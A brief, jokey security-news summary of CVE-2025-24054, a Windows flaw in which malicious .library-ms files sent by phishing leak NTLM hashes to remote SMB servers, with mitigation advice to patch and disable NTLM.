Hackers Exploit Windows Flaw: NTLM Hashes at Risk in Sneaky Phishing Attack

Hackers are exploiting a Windows vulnerability to capture NTLM hashes using .library-ms files, targeting government and private entities. Despite being patched, active exploitation was observed shortly after. The flaw, CVE-2025-24054, poses a significant risk with minimal user interaction needed, prompting urgent security updates and disabling NTLM where unnecessary.

3P
Published: April 17, 2025 7:28 pmAdded: April 17, 2025 at 12:51 pmAssembled by: The Editor
Pro Dashboard

Hot Take:

Who knew that a seemingly innocuous .library-ms file could pack such a punch? It’s like finding out your cat has been secretly leading a double life as a cybercriminal. If you’ve been using NTLM like it’s 1999, it’s time to let go and embrace Kerberos—because NTLM is basically the MySpace of authentication protocols right now.

Key Points:

  • CVE-2025-24054 is a Windows vulnerability that exposes NTLM hashes using .library-ms files.
  • The flaw was initially not considered actively exploited but is now being used in phishing campaigns.
  • Phishing emails targeting Polish and Romanian entities included malicious .library-ms files.
  • The attacks involve remote SMB servers capturing NTLM hashes for potential privilege escalation.
  • Organizations are advised to update systems and disable NTLM if possible.

Membership Required

 You must be a member to access this content.

View Membership Levels
Already a member? Log in here
The Nimble Nerd
powered by the NSA, er,  GDPR Cookie Compliance
Confessional Booth of Our Digital Sins

Okay, deep breath, let's get this over with. In the grand act of digital self-sabotage, we've littered this site with cookies. Yep, we did that. Why? So your highness can have a 'premium' experience or whatever. These traitorous cookies hide in your browser, eagerly waiting to welcome you back like a guilty dog that's just chewed your favorite shoe. And, if that's not enough, they also tattle on which parts of our sad little corner of the web you obsess over. Feels dirty, doesn't it?